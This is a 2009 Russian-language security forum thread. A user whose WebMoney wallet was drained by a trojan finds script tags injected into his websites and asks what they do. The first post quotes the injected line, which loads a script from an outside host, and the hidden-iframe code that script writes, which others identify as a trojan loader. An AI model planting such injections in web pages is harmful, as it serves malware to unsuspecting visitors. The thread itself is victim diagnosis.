Что это за скрипт?

Discussion in 'Безопасность и Анонимность' started by LeRick, 2 Sep 2009.

  1. LeRick

    LeRick New Member

    Joined:
    6 Jun 2009
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    На днях у меня "похозяйничал" троян... Увели 3 бакса с webmoney. Вроде бы всё почистил. Но вчера заметил, что на всех моих сайтах в конце всех страниц index или main появился такой код
    Code:
    <script src=http://flo4.cn/1.txt></script>
    По адресу flo4.cn/1.txt соответственно находится такой скрипт:
    Code:
    document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5' style='display: none;'></iframe>");
    Я понимаю, что попало это туда скорее всего через Тотал Коммандер. Пароли к фтп все храню там (знаю, что небезопасно, но ничего ценного в тех сайтах нет).
    Интересно, что происходит при срабатывании этого скрипта в конечном итоге?
     
  2. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    во первых- почисть host -папочку !! во вторых я думаю что сам панимаеш что ето значит document.write("<iframe src='http://hot77.biz/myy/show.php?s=65904708a5 !!! посмотри host файлы - там наверника что то левое !!((
     
  3. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    LeRick - а вопше то юзай поиском по iframe ! http://forum.antichat.ru/search.php?searchid=5058055&pp=25&page=1
     
  4. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    в этом айфрейме подгрузчик трояна
     
  5. X-3

    X-3 Member

    Joined:
    28 Mar 2009
    Messages:
    306
    Likes Received:
    58
    Reputations:
    -2
    У меня вопрос: а как смогли с WebMoney баки потянуть?
    Возможно, троян - всего лишь маскировка?
     
  6. LeRick

    LeRick New Member

    Joined:
    6 Jun 2009
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Не знаю, я ж не специалист:)
    Кипер на компе был онлайн. WMZ перевели через обменник на яндекс-деньги. Возможно, меня не было за компом в это время. Не помню. Увидел позже сообщение об авторизации и пустой вмз кошелек. WMR не тронули, хотя там больше было, чем на вмз. У меня в настройках была включена возможность совершения операций через кипер-мини. Скорее всего этим и воспользовались...
    После этого я отключил использование кипер-мини, сменил пароль, сделал новый файл ключей и установил активацию через телефон, а не через мэйл. А через пару дней получаю смску с кодом для активации кипера на другом компе. Видимо, опять пытались забраться в кошелек :)
     
  7. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    кажетсо шо у тебя бекдор !встанови фаэрвол !! )))
     
  8. LeRick

    LeRick New Member

    Joined:
    6 Jun 2009
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Фаервол стоял. Комодо. Вчера снес его и поставил старый добрый Аутпост:)
    Зашел на страничку с таким ифреймом и Аутпост сразу доложил об подозрительных действиях. В папку Windows/Temp загружается файл экзешный и пытается изменить explorer.exe и еще парочку прог винды.
    Больше ничего подозрительного не замечал. Сегодня с утра проверил полностью комп антивирусом и воспользовался помощью на сайте virusinfo. Сказали, что в логах, которые я им отослал, ничего подозрительного нет.
     
  9. X-3

    X-3 Member

    Joined:
    28 Mar 2009
    Messages:
    306
    Likes Received:
    58
    Reputations:
    -2
    У меня даже уведомление об ответе в этой теме антивирус на почту не пропускает.

    "Держите штаны крепче, господа" (с)
     
  10. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    Читайте отчет. Оттуда и связку можно дернуть и малвару их пореверсить :)
    http://wepawet.iseclab.org/view.php?hash=d91da88baf6ef98f1c3552742ff66a76&t=1251968690&type=js
     
    #10 spider-intruder, 3 Sep 2009
    Last edited: 3 Sep 2009